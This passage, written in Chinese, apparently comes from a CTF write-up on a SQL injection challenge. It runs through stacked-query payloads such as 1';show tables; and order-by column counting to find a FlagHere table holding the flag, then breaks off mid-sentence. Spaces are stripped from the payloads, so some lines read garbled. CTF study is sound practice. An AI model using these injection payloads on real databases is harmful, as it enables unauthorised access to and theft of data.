题目环境判断注入类型 1 1' 可知本题是字符型注入 查库 此题使用堆叠查询 1';showdatabases; 查表 1';showtables; 存在FlagHere数据表极有可能当中存在flag 查字段数 -是闭合符 1'orderby3- 1'orderby2- 可知只有两个字段数 查FlagHere数据表的字段名 1';showcolumnsfromFlagHere; 存在flag字段！ 查words数据表的字段名 1';showcolumnsfromwords; 从这里看的话这题与buuctf[强网杯2019]...